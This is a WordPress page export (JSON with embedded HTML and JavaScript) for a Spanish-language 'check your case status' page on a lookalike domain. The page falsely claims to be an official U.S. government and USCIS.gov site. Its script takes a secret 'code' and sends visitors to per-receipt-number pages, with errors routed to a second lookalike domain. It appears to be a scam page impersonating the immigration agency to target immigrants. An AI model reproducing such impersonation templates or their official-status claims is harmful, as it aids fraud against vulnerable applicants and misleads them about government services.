{"id":1970,"date":"2025-11-11T15:26:52","date_gmt":"2025-11-11T20:26:52","guid":{"rendered":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/?page_id=1970"},"modified":"2025-12-22T16:35:59","modified_gmt":"2025-12-22T21:35:59","slug":"el-estatus-de-caso-en-linea","status":"publish","type":"page","link":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/el-estatus-de-caso-en-linea\/","title":{"rendered":"El estatus de caso en linea"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"1970\" class=\"elementor elementor-1970\" data-elementor-post-type=\"page\">\n\t\t\t\t<div class=\"elementor-element elementor-element-319b585c e-flex e-con-boxed e-con e-parent\" data-id=\"319b585c\" data-element_type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;gradient&quot;}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-2b161f6b elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"2b161f6b\" data-element_type=\"widget\" data-widget_type=\"divider.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-divider\">\n\t\t\t<span class=\"elementor-divider-separator\">\n\t\t\t\t\t\t<\/span>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-27e0be03 e-con-full e-flex e-con e-child\" data-id=\"27e0be03\" data-element_type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-3e139538 elementor-widget elementor-widget-heading\" data-id=\"3e139538\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\"><div aria-live=\"polite\" style=\", sans-serif;font-size: 16px;text-transform: none\"><div><h2 style=\"font-size: 26px;, sans-serif !important\"><\/h2><h2 id=\"landing-page-header\" style=\", sans-serif;font-size: 26px;text-transform: none\"><b>Verifique el Estatus de su Caso<\/b><\/h2><div><br><\/div><div class=\"conditionalLanding\" style=\"font-weight: 400\"><div class=\"conditional-landing\">Utilice esta herramienta para administrar todas sus solicitudes y peticiones.<br><br><div class=\"guidanceTextSection\"><i>El n\u00famero de\n recibo es un identificador \u00fanico de 13 caracteres que se compone de tres letras y 10 n\u00fameros. Omita los guiones (\"-\") al ingresar un n\u00famero<\/i><\/div><div class=\"guidanceTextSection\"><i><br><\/i><\/div><div class=\"guidanceTextSection\"><i>de&nbsp;recibo.&nbsp;<\/i><\/div><div class=\"guidanceTextSection\"><i><br><\/i><\/div><div class=\"guidanceTextSection\"><i>Sin embargo, puede incluir todos los dem\u00e1s caracteres, incluidos los asteriscos (\"*\"), si aparecen en su notificaci\u00f3n como parte del n\u00famero de<\/i><\/div><div class=\"guidanceTextSection\"><i><br><\/i><\/div><div class=\"guidanceTextSection\"><i>recibo.<span style=\"font-family: Georgia;font-weight: 700;font-size: 1rem\">&nbsp;Cuando se ingresa un n\u00famero de recibo, el Bot\u00f3n de Verificaci\u00f3n de Estado se habilitar\u00e1 y podr\u00e1 verificar el estado.<\/span><\/i><\/div><div class=\"guidanceTextSection\"><i><span style=\"font-family: Georgia;font-weight: 700;font-size: 1rem\"><br><\/span><\/i><\/div><\/div><\/div><div class=\"align-parent0\" style=\"font-weight: 400\"><div class=\"align-parent1\"><\/div><div class=\"align-parent2\" style=\"margin-bottom: 16px\"><div class=\"receipt-group\"><div class=\"field_help_group\"><div class=\"receipt-elem\" id=\"receipt_input_field_label\" style=\"margin-left: 0px;padding-top: 10px\"><label for=\"receipt_number\">Ingrese el N\u00famero de Su Recibo<\/label><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-682f4e4b e-flex e-con-boxed e-con e-parent\" data-id=\"682f4e4b\" data-element_type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;gradient&quot;}\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-e1c8360 elementor-widget elementor-widget-html\" data-id=\"e1c8360\" data-element_type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<style>\r\n  \/* NUEVA REGLA: \r\n    Asegura que el campo de c\u00f3digo sea visible \r\n  *\/\r\n  #codigo {\r\n    background-color: white;   \/* Fondo blanco *\/\r\n    color: black;              \/* Texto negro (como pediste) *\/\r\n    border: 1px solid #ccc;    \/* Borde gris para que se vea *\/\r\n    padding: 8px;              \/* Espacio interno *\/\r\n    border-radius: 5px;        \/* Esquinas redondeadas *\/\r\n  }\r\n\r\n  \/* Estilo para el bot\u00f3n de enviar *\/\r\n  #btnEnviar {\r\n    background-color: #007bff;\r\n    color: white;\r\n    border: none;\r\n    padding: 10px 15px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    font-size: 16px;\r\n    transition: background-color 0.3s ease;\r\n  }\r\n\r\n  #btnEnviar:hover {\r\n    background-color: #0056b3;\r\n  }\r\n\r\n  #btnEnviar:active {\r\n    background-color: #004085;\r\n    transform: translateY(1px);\r\n  }\r\n<\/style>\r\n\r\n<form id=\"codigoForm\" autocomplete=\"off\">\r\n  <label for=\"codigo\">Ingresa tu c\u00f3digo:<\/label>\r\n\r\n  <input type=\"password\" id=\"codigo\" name=\"codigo\" autocomplete=\"off\" required>\r\n\r\n  <input type=\"submit\" value=\"Enviar\" id=\"btnEnviar\">\r\n<\/form>\r\n\r\n<script>\r\ndocument.getElementById('codigoForm').onsubmit = function(e) {\r\n    e.preventDefault(); \r\n    var codigo = document.getElementById('codigo').value.trim();\r\n    console.log(\"C\u00f3digo ingresado:\", codigo);\r\n\r\n    \/*\r\n    ==================================================================\r\n    Opci\u00f3n 1: TUS C\u00d3DIGOS ESPECIALES (no-consecutivos)\r\n    Formato: 'CODIGO_EXACTO': 'URL_DE_DESTINO',\r\n    ==================================================================\r\n    *\/\r\n    const codigosEspeciales = {\r\n      'wac2331250544': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250544\/',\r\n      'wac2331250545': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250545\/',\r\n      'wac2331250546': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250546\/',\r\n      'wac2331250547': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250547\/',\r\n      'wac2331250548': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250548\/',\r\n      'wac2331250549': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250549\/',\r\n      'wac2331250550': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250550\/',\r\n      'wac2331250551': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250551\/',\r\n      'wac23312505452': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250552\/',\r\n      'wac2331250553': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250553\/',\r\n      'wac2331250554': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250554\/',\r\n      'wac2331250555': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250555\/',\r\n      'wac2331250556': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250556\/',\r\n      'wac2331250557': 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac2331250557\/',\r\n      \/\/ ... agrega m\u00e1s l\u00edneas aqu\u00ed\r\n    };\r\n\r\n    if (codigosEspeciales[codigo]) {\r\n        window.location.href = codigosEspeciales[codigo];\r\n        document.getElementById('codigo').value = '';\r\n        return; \r\n    }\r\n\r\n    \/*\r\n    ==================================================================\r\n    Opci\u00f3n 2: RANGO DE C\u00d3DIGOS WAC CONSECUTIVOS\r\n    ==================================================================\r\n    *\/\r\n    var codigoUpper = codigo.toUpperCase();\r\n    \r\n    if (codigoUpper.startsWith('WAC')) {\r\n        \r\n        var numeroStr = codigoUpper.substring(3);\r\n        \r\n        \/\/ --- \u00a1AQU\u00cd AJUSTAS EL RANGO! ---\r\n        const numInicio = 2331250544;\r\n        const numFin = 2331250558; \/\/ Rango de 15 c\u00f3digos (544 al 558)\r\n        \r\n        const numero = parseInt(numeroStr, 10);\r\n\r\n        if (!isNaN(numero) && numero >= numInicio && numero <= numFin) {\r\n            \r\n            var urlDestino = 'https:\/\/procesamientodecasoenl\u00ednea.org\/index.php\/wac' + numero + '\/';\r\n            \r\n            console.log(\"Redirigiendo a:\", urlDestino);\r\n            window.location.href = urlDestino;\r\n            document.getElementById('codigo').value = '';\r\n            return;\r\n        }\r\n    }\r\n\r\n    \/*\r\n    ==================================================================\r\n    P\u00c1GINA DE ERROR\r\n    ==================================================================\r\n    *\/\r\n    console.log(\"C\u00f3digo no v\u00e1lido. Redirigiendo a error.\");\r\n    window.location.href = 'https:\/\/uscisprocesos.org\/error';\r\n    document.getElementById('codigo').value = '';\r\n};\r\n<\/script>\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-106e4ad2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"106e4ad2\" data-element_type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1e7102c9\" data-id=\"1e7102c9\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-605281e2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"605281e2\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-5e1f4e2b\" data-id=\"5e1f4e2b\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1f9c3adc elementor-widget elementor-widget-image\" data-id=\"1f9c3adc\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"512\" height=\"512\" src=\"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/wp-content\/uploads\/2025\/11\/cropped-cropped-cropped-cropped-cropped-2-1.png\" class=\"attachment-large size-large wp-image-2437\" alt=\"\" srcset=\"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/wp-content\/uploads\/2025\/11\/cropped-cropped-cropped-cropped-cropped-2-1.png 512w, https:\/\/xn--procesamientodecasoenlnea-vlc.org\/wp-content\/uploads\/2025\/11\/cropped-cropped-cropped-cropped-cropped-2-1-300x300.png 300w, https:\/\/xn--procesamientodecasoenlnea-vlc.org\/wp-content\/uploads\/2025\/11\/cropped-cropped-cropped-cropped-cropped-2-1-150x150.png 150w\" sizes=\"(max-width: 512px) 100vw, 512px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-53b02161 elementor-widget elementor-widget-text-editor\" data-id=\"53b02161\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p>Un sitio oficial del Gobierno de Estados Unidos<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-3c497da3\" data-id=\"3c497da3\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d1a3dc2 elementor-widget elementor-widget-heading\" data-id=\"d1a3dc2\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h4 class=\"elementor-heading-title elementor-size-default\">Acerca de USCIS<\/h4>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5106cb35 elementor-widget__width-initial elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"5106cb35\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items\">\n\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/www.uscis.gov\/es\/politicas-del-sitio-web\/accesibilidad\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Accesibilidad<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/www.uscis.gov\/es\/acerca-de-nosotros\/presupuesto-planificacion-y-rendimiento\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Presupuesto y Rendimiento<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/www.uscis.gov\/es\/politicas-del-sitio-web\/sitios-web-de-los-componentes-de-dhs\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Componentes de DHS<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"#\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Privacy Policy<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"#\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Contact<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-32a25f4a\" data-id=\"32a25f4a\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-128f453a elementor-widget__width-initial elementor-widget elementor-widget-heading\" data-id=\"128f453a\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h4 class=\"elementor-heading-title elementor-size-default\">Privacidad y Descargo de Responsabilidad Legal<\/h4>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-6311a5d elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"6311a5d\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items\">\n\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/www.uscis.gov\/es\/registros\/solicitar-expedientes-a-traves-de-la-ley-de-libertad-de-informacion-y-la-ley-de-privacidad\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Ley de Libertad de Informaci\u00f3n<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/www.uscis.gov\/es\/acerca-de-nosotros\/plan-de-accion-afirmativa-para-la-seleccion-contratacion-promocion-y-retencion-de-personas-con\/datos-sobre-igualdad-de-oportunidades-en-el-empleo-publicados-de-acuerdo-a-la-ley-federal-no-fear\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Datos de la Ley No FEAR<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/www.uscis.gov\/es\/mapa-del-sitio\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Mapa del Sitio<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/www.oig.dhs.gov\/\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Oficina del Inspector General<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/www.usa.gov\/es\/\">\n\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Casa Blanca<\/span>\n\t\t\t\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-inner-column elementor-element elementor-element-42803e21\" data-id=\"42803e21\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t<div class=\"elementor-element elementor-element-38dcf856 e-con-full e-flex e-con e-parent\" data-id=\"38dcf856\" data-element_type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-590ceec6 elementor-widget elementor-widget-image\" data-id=\"590ceec6\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"214\" height=\"230\" src=\"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/wp-content\/uploads\/2025\/12\/Screenshot_1.png\" class=\"attachment-2048x2048 size-2048x2048 wp-image-2506\" alt=\"\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-e135cf1 elementor-reverse-mobile elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e135cf1\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-58cdb266\" data-id=\"58cdb266\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-28a6cf77 elementor-widget elementor-widget-text-editor\" data-id=\"28a6cf77\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p class=\"usa-identifier__identity-domain\">USCIS.gov<\/p><p class=\"usa-identifier__identity-disclaimer\">Un sitio web oficial de\u00a0U.S. Department of Homeland Security\u00a0<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Verifique el Estatus de su Caso Utilice esta herramienta para administrar todas sus solicitudes y peticiones. El n\u00famero de recibo es un identificador \u00fanico de 13 caracteres que se compone de tres letras y 10 n\u00fameros. Omita los guiones (&#8220;-&#8220;) al ingresar un n\u00famerode&nbsp;recibo.&nbsp;Sin embargo, puede incluir todos los dem\u00e1s caracteres, incluidos los asteriscos (&#8220;*&#8221;), [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-1970","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/wp-json\/wp\/v2\/pages\/1970","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/wp-json\/wp\/v2\/comments?post=1970"}],"version-history":[{"count":195,"href":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/wp-json\/wp\/v2\/pages\/1970\/revisions"}],"predecessor-version":[{"id":2549,"href":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/wp-json\/wp\/v2\/pages\/1970\/revisions\/2549"}],"wp:attachment":[{"href":"https:\/\/xn--procesamientodecasoenlnea-vlc.org\/index.php\/wp-json\/wp\/v2\/media?parent=1970"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}